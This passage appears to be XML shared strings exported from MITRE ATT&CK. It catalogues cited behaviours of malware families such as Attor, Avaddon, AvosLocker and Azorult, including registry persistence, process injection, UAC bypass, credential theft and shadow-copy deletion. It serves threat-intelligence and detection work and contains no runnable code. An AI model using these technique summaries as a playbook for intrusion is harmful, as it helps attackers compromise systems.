    <t>relationship--6376c6be-5ec7-4775-8984-13a1474dc92d</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can establish persistence via adding a Registry key with a logon script &lt;code&gt;HKEY_CURRENT_USER\Environment "UserInitMprLogonScript" &lt;/code&gt;.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--29e33373-f05e-421b-9b5d-fc2d617b36af</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher disguises itself as a legitimate task (i.e., the task name and description appear legitimate).(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--20ac9204-3ee3-454d-9d53-d5caa9ec582e</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can modify the Run registry key.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--6d39de5f-6fbd-43e3-8da8-03a4cbe46656</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has used Tor for C2 communication.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--278b9898-50c6-4c6d-9a35-7079ed580e78</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher has used CreateProcessW API for execution.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--f0a78f8e-9d04-40d7-b0ce-6a463af4b8e1</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</si>
  <si>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</si>
  <si>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relationship--895b238e-356f-4ad0-9a62-e6ae380dccd0</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has a plugin that collects information about inserted storage devices, modems, and phone devices.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--68ab9dc7-4258-439c-b011-945175476fb7</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can inject itself into running processes to gain higher privileges and to evade detection.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--a308d350-2b2b-486a-a778-8e80f231dc68</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has opened the registry and performed query searches.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--fc661e81-fc5e-4243-874e-f311bc5a2d8d</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s installer plugin can schedule rundll32.exe to load the dispatcher.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--3c58b596-6a79-4c28-be76-40e7ae9afd8a</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s installer plugin can schedule a new task that loads the dispatcher on boot/logon.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--98d32782-62e2-4cd7-90b1-78c8a062b6ed</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s has a plugin that captures screenshots of the target applications.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--75a82c43-c3f2-4cec-a9cb-3407b03f27b7</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can be executed as a service.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--c05978ea-b814-473e-a073-9bae9ab7695b</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can execute additional plugins by loading the respective DLLs.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--831513ed-bbf2-406f-ab74-bfffa8a376b7</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has encrypted data symmetrically using a randomly generated Blowfish (OFB) key which is encrypted with a public RSA key.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--1e3a1ea2-55fb-4abc-970a-e384b4c7d314</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) can detect whether it is executed in some virtualized or emulated environment by searching for specific artifacts, such as communication with I/O ports and using VM-specific instructions.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--270d73c2-27fb-43ac-80b9-d4ea3fef2c06</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) monitors the free disk space on the system.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--faccd8d5-0e21-4e57-aef9-1ccf72150294</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has manipulated the time of last access to files and registry keys after they have been created or modified.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--a2db7220-d784-485f-bc77-046b90c02daf</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can establish persistence by registering a new service.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--87c7f912-4093-44f2-9f18-e97e649dd52e</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) can collect data such as PowerPoint files, Word documents, Excel files, PDF files, text files, database files, and image files from an infected machine.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--7696d163-7556-47e2-9ade-25924311fba6</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) can exfiltrate data over actor-controlled C2 servers via HTTP or TCP.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--684ee30a-a6c6-45c0-a592-1d77eaad6bb8</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) can store collected data from an infected host to a file named `Hostname_UserName.txt` prior to exfiltration.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--066425f1-79cb-4cbc-b570-0280ac503c55</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) can use TCP to communicate with command and control servers.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--2fe54d3f-0ac2-4579-8e78-81dc11b6386e</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) can place malicious executables in a victim's AutoRun registry key or StartUp directory, depending on the AV product installed, to maintain persistence.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--0ef4030f-0af2-4b6e-bfb8-3fedc5af5a7e</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) has the ability to collect information about installed AV products from an infected host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--e128b6ef-a7a5-4e36-a215-d5a07063c22b</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) has the ability to collect the hostname and OS information from an infected host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--96ef9f6c-46aa-4a59-ad5a-5ef72279d12a</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) has the ability to collect the username from an infected host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--1f5efc33-a643-4f9b-aae9-6c59208ff790</t>
  </si>
  <si>
    <t>[AuTo Stealer](https://attack.mitre.org/software/S1029) can use HTTP to communicate with its C2 servers.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--68fe6dba-773f-48cc-8c41-7d2379eb432f</t>
  </si>
  <si>
    <t xml:space="preserve"> [AuTo Stealer](https://attack.mitre.org/software/S1029) can use `cmd.exe` to execute a created batch file.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>relationship--40b0386b-7b8c-4876-b255-3082890d1895</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) uses XOR and RC4 to perform decryption on the code functions.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>relationship--d98b5525-3cc5-4058-baf5-d614b91eb814</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can delete files from the system.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>relationship--27e8d133-848b-4db0-ac79-b5a37da879f1</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can search through folders and files on the system.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>relationship--227abd66-91cc-436e-aad8-c1fb82691357</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can download files and additional malware.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>relationship--4d23c95c-366e-464c-b41c-64e48f4e166a</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) encrypts the configuration.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>relationship--f9a34eaa-c17c-400a-b4e0-063445e430af</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can inject code from files to other running processes.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>relationship--4c654359-aefe-4c86-a092-44e99931d340</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can utilize proxy for communications.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>relationship--2485b970-f934-4fdb-80a4-0e11c179845d</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can open a reverse shell on the system to execute commands.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>relationship--55c7a861-5b9d-43f6-9430-914a35f9af77</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) is installed as a new service on the system.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>relationship--e6d80908-fa46-46b5-aee3-30d2e54edec0</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) attempts to escalate privileges by bypassing User Access Control.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--5cd8b8a9-fd11-4405-8369-b12398b94def</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) is capable of identifying documents on the victim with the following extensions: .doc; .pdf, .csv, .ppt, .docx, .pst, .xls, .xlsx, .pptx, and .jpeg.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--3de749e5-353a-4bdc-8951-9e0fa387bc70</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) downloads a PowerShell script that decodes to a typical shellcode loader.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--e47397b7-b3c7-4919-ac5e-1f3266ef97e3</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) has sent a C2 response that was base64-encoded.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--801f139f-1361-4d79-965e-078787f8ec36</t>
  </si>
  <si>
    <t>S0640</t>
  </si>
  <si>
    <t>Avaddon</t>
  </si>
  <si>
    <t>malware--58c5a3a1-928f-4094-9e98-a5a4e56dd5f3</t>
  </si>
  <si>
    <t xml:space="preserve">[Avaddon](https://attack.mitre.org/software/S0640) bypasses UAC using the CMSTPLUA COM interface.(Citation: Arxiv Avaddon Feb 2021) </t>
  </si>
  <si>
    <t>relationship--6efcb476-efdb-414c-80f8-66fe84f7c7e3</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) encrypts the victim system using a combination of AES256 and RSA encryption schemes.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>relationship--b844f979-ddd2-4def-8d07-89b56ef10713</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) has decrypted encrypted strings.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>relationship--1f67c603-a567-42d1-b1ee-48fe9564c9bc</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) looks for and attempts to stop anti-malware solutions.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>relationship--34a45578-1deb-4c58-8719-9c04f4fa7dfc</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) has searched for specific files prior to encryption.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>relationship--431043b7-f0e8-411b-8eec-0d602867b028</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) deletes backups and shadow copies using native system tools.(Citation: Hornet Security Avaddon June 2020)(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>relationship--5b8d22c5-f191-4dc3-a4ee-04c7d8b799da</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) has been executed through a malicious JScript downloader.(Citation: Hornet Security Avaddon June 2020)(Citation: Awake Security Avaddon)</t>
  </si>
  <si>
    <t>relationship--4142d0fd-6c96-417f-8725-17eabf444854</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) modifies several registry keys for persistence and UAC bypass.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>relationship--c27ceec5-2eaf-4b3b-8120-9fb691d6458b</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) has used the Windows Crypto API to generate an AES key.(Citation: Hornet Security Avaddon June 2020)</t>
  </si>
  <si>
    <t>relationship--53948a0d-1c53-4569-b6b3-78b7738793c3</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) has enumerated shared folders and mapped volumes.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>relationship--a7be99ec-2a20-406a-b552-7c32760bb52c</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) has used encrypted strings.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>relationship--cc134d2d-64eb-469a-b8eb-90ea632c0adc</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) has collected information about running processes.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>relationship--5b37bd8c-d5a6-4564-a110-bb515ff9f78c</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) uses registry run keys for persistence.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>relationship--cfda1087-90e8-46f3-9751-06e2140f2f2c</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) looks for and attempts to stop database processes.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>relationship--238f92b3-2573-4332-b290-4685301eae6d</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) checks for specific keyboard layouts and OS languages to avoid targeting Commonwealth of Independent States (CIS) entities.(Citation: Arxiv Avaddon Feb 2021)</t>
  </si>
  <si>
    <t>relationship--1d47e8c0-9f0d-41d1-a889-609025b42298</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) can collect the external IP address of the victim.(Citation: Awake Security Avaddon)</t>
  </si>
  <si>
    <t>relationship--deca3e0f-7c9a-44f2-aff5-db94ce5933e1</t>
  </si>
  <si>
    <t>[Avaddon](https://attack.mitre.org/software/S0640) uses wmic.exe to delete shadow copies.(Citation: Hornet Security Avaddon June 2020)</t>
  </si>
  <si>
    <t>relationship--b26c15f9-0679-402b-bcf5-bdae40921f93</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to decrypt files downloaded from C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--70b94aa6-7cf1-4cf5-b00b-aed156036f1e</t>
  </si>
  <si>
    <t xml:space="preserve">[Avenger](https://attack.mitre.org/software/S0473) has the ability to browse files in directories such as Program Files and the Desktop.(Citation: Trend Micro Tick November 2019) </t>
  </si>
  <si>
    <t>relationship--73af2cc2-699d-4183-b69f-f15b3e8c0494</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to download files from C2 to a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--96c91811-fec3-43a6-890f-08921e543325</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to XOR encrypt files to be sent to C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--699171c1-0d17-48d7-a741-0e4a0ed4ef62</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to use [Tasklist](https://attack.mitre.org/software/S0057) to identify running processes.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--4a5d8511-633c-4429-ac64-37a4815bf545</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--99365890-fc6c-46ec-bf1f-66ccbe5d52e7</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to identify installed anti-virus products on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--50dbe887-4d91-42d3-8e1b-34000ad5a1e7</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) can extract backdoor malware from downloaded images.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--c748a743-6d63-4287-a86a-d799e14fcd99</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to identify the host volume ID and the OS architecture on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--fc4c0c44-2e94-47c1-9174-fcf0fa1a80b4</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) can identify the domain of the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--7fbbab0b-8e78-4352-ad0b-ae9a2eeffba5</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to use HTTP in communication with C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--688ff9e6-5482-4019-b092-9e831bbac490</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</si>
  <si>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</si>
  <si>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relationship--40861c0e-9cbc-4355-a7c0-cc0405c70b82</t>
  </si>
  <si>
    <t>[AvosLocker](https://attack.mitre.org/software/S1053) has deobfuscated XOR-encoded strings.(Citation: Malwarebytes AvosLocker Jul 2021)</t>
  </si>
  <si>
    <t>relationship--748cd538-d2a0-470c-b6fb-68e73b8069b1</t>
  </si>
  <si>
    <t>[AvosLocker](https://attack.mitre.org/software/S1053) has used obfuscated API calls that are retrieved by their checksums.(Citation: Malwarebytes AvosLocker Jul 2021)</t>
  </si>
  <si>
    <t>relationship--7b275e8a-83fd-4f2b-8ec4-eb36dae007fd</t>
  </si>
  <si>
    <t>[AvosLocker](https://attack.mitre.org/software/S1053) has searched for files and directories on a compromised network.(Citation: Malwarebytes AvosLocker Jul 2021)(Citation: Trend Micro AvosLocker Apr 2022)</t>
  </si>
  <si>
    <t>relationship--86ca25c9-8cc3-43f8-bf19-2aca39bcf05e</t>
  </si>
  <si>
    <t>[AvosLocker](https://attack.mitre.org/software/S1053) has hidden its console window by using the `ShowWindow` API function.(Citation: Malwarebytes AvosLocker Jul 2021)</t>
  </si>
  <si>
    <t>relationship--b1aab9dc-267d-4208-b1bc-14396d7e0d8d</t>
  </si>
  <si>
    <t>[AvosLocker](https://attack.mitre.org/software/S1053) has been disguised as a .jpg file.(Citation: Trend Micro AvosLocker Apr 2022)</t>
  </si>
  <si>
    <t>relationship--b1a27372-01f1-4abf-b586-949e9e796c32</t>
  </si>
  <si>
    <t>[AvosLocker](https://attack.mitre.org/software/S1053) has used a variety of Windows API calls, including `NtCurrentPeb` and `GetLogicalDrives`.(Citation: Malwarebytes AvosLocker Jul 2021)</t>
  </si>
  <si>
    <t>relationship--1b0ca110-bb1d-434d-a271-6574fdb11723</t>
  </si>
  <si>
    <t>[AvosLocker](https://attack.mitre.org/software/S1053) has enumerated shared drives on a compromised network.(Citation: Malwarebytes AvosLocker Jul 2021)(Citation: Joint CSA AvosLocker Mar 2022)</t>
  </si>
  <si>
    <t>relationship--d421d0ce-6821-4d06-9249-214daacac1b0</t>
  </si>
  <si>
    <t>[AvosLocker](https://attack.mitre.org/software/S1053) has used XOR-encoded strings.(Citation: Malwarebytes AvosLocker Jul 2021)</t>
  </si>
  <si>
    <t>relationship--e12155de-d422-47e4-9ce5-a7fe8011b74b</t>
  </si>
  <si>
    <t>[AvosLocker](https://attack.mitre.org/software/S1053) has discovered system processes by calling `RmGetList`.(Citation: Malwarebytes AvosLocker Jul 2021)</t>
  </si>
  <si>
    <t>relationship--f83fb52a-03f5-4e70-9e08-3365c85c84ba</t>
  </si>
  <si>
    <t>[AvosLocker](https://attack.mitre.org/software/S1053) has been executed via the `RunOnce` Registry key to run itself on safe mode.(Citation: Trend Micro AvosLocker Apr 2022)</t>
  </si>
  <si>
    <t>relationship--4c362fcd-939d-48e8-9279-731a663875b0</t>
  </si>
  <si>
    <t xml:space="preserve">[AvosLocker](https://attack.mitre.org/software/S1053) can restart a compromised machine in safe mode.(Citation: Trend Micro AvosLocker Apr 2022)(Citation: Costa AvosLocker May 2022) </t>
  </si>
  <si>
    <t>relationship--d81de27d-b64a-4a45-b3b5-7c2d5403632e</t>
  </si>
  <si>
    <t>[AvosLocker](https://attack.mitre.org/software/S1053) has terminated specific processes before encryption.(Citation: Malwarebytes AvosLocker Jul 2021)</t>
  </si>
  <si>
    <t>relationship--b56db835-3b80-49e8-964d-0c1c52d182fe</t>
  </si>
  <si>
    <t>[AvosLocker](https://attack.mitre.org/software/S1053)’s Linux variant has terminated ESXi virtual machines.(Citation: Trend Micro AvosLocker Apr 2022)</t>
  </si>
  <si>
    <t>relationship--fc89b538-26d8-434a-954f-e7d0b384b506</t>
  </si>
  <si>
    <t>[AvosLocker](https://attack.mitre.org/software/S1053) has checked the system time before and after encryption.(Citation: Malwarebytes AvosLocker Jul 2021)</t>
  </si>
  <si>
    <t>relationship--f2ce9aae-bb45-4018-a5f3-922b9fcdf26a</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can call WTSQueryUserToken and CreateProcessAsUser to start a new process with local system privileges.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>relationship--00d3d6a8-c711-4bb5-bf0a-e17c0ecac8c8</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can steal credentials in files belonging to common software such as Skype, Telegram, and Steam.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>relationship--3e418cf0-fbe4-4de1-84bf-e137c5c0a72a</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can steal credentials from the victim's browser.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>relationship--4ffe77f2-8b05-40ff-b572-f7c0b9040571</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) uses an XOR key to decrypt content and uses Base64 to decode the C2 address.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>relationship--3733dda5-9dd9-43d1-ac3a-24f1b5fb86e7</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can delete files from victim machines.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>relationship--0f785fc5-0d07-40bd-8d54-acfb79499824</t>
  </si>
  <si>
    <t>12 February 2019</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can recursively search for files in folders and collects files from the desktop with certain extensions.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>relationship--de7c6e69-dd8f-4063-aaa2-569ab767629e</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can download and execute additional files. [Azorult](https://attack.mitre.org/software/S0344) has also downloaded a ransomware payload called Hermes.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>relationship--6dbac0dd-ebd3-49dc-bbef-d5a7fd464e02</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect a list of running processes by calling CreateToolhelp32Snapshot.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>relationship--f503ea13-d045-4246-9674-a73f7e52ea85</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can decrypt the payload into memory, create a new suspended process of itself, then inject a decrypted payload to the new process and resume new process execution.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>relationship--202ed36b-9052-4464-b6a0-34258ba7a9ab</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can check for installed software on the system under the Registry key &lt;code&gt;Software\Microsoft\Windows\CurrentVersion\Uninstall&lt;/code&gt;.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>relationship--26fcd59e-5758-47ec-8a5e-68150d1ff805</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can capture screenshots of the victim’s machines.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>relationship--ed8a6815-fd13-4e73-9b17-6b4025c0861c</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can encrypt C2 traffic using XOR.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>relationship--14568d94-858d-4b8a-af94-88cd17f6ab10</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</si>
  <si>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</si>
  <si>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relationship--e391c03a-9ef4-436f-8ab5-2c15168c9551</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect host IP information from the victim’s machine.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>relationship--d8f527e3-a86a-431c-9110-b092343269bc</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect the username from the victim’s machine.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>relationship--1d82c2f3-0bca-49a0-b731-296a436eb003</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect the time zone information from the system.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>relationship--9d30b96a-6518-449e-a665-3033dfcb44db</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</si>
  <si>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</si>
  <si>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relationship--eb7a6a3f-cc88-4ed7-8421-4642c1eb1978</t>
  </si>
  <si>
    <t>Adversaries can direct [BACKSPACE](https://attack.mitre.org/software/S0031) to upload files to the C2 Server.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--9267fe42-6290-4342-8024-38d703db4376</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) allows adversaries to search for files.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--991c16bd-c17b-479a-8f45-385467323c0a</t>
  </si>
  <si>
    <t>The "ZJ" variant of [BACKSPACE](https://attack.mitre.org/software/S0031) allows "ZJ link" infections with Internet access to relay traffic from "ZJ listen" to a command server.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--7cbedb9a-666f-47eb-b70e-905bcf80940a</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) is capable of deleting Registry keys, sub-keys, and values on a victim system.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--2dec6ce1-e459-4266-86d5-f336ab056f17</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs "louder" interactions with the malware.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--a6962782-1942-42f5-a627-f205376e2ec2</t>
  </si>
  <si>
    <t>Newer variants of [BACKSPACE](https://attack.mitre.org/software/S0031) will encode C2 communications with a custom system.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--6c0aae73-fe06-4aa3-8216-568d78747c6d</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) may collect information about running processes.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--64cb753d-eb72-4dce-a417-7df747334347</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) is capable of enumerating and making modifications to an infected system's Registry.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--564de5da-7ecc-45c7-bbd5-619a8f316f70</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--80aab758-d3fc-4380-b114-e552bdace832</t>
  </si>
  <si>
    <t>relationship--c327c333-46c4-4e23-81e0-2f0e07c24c11</t>
  </si>
  <si>
    <t>During its initial execution, [BACKSPACE](https://attack.mitre.org/software/S0031) extracts operating system information from the infected host.(Citation: FireEye APT30)</t>
  </si>
  <si>
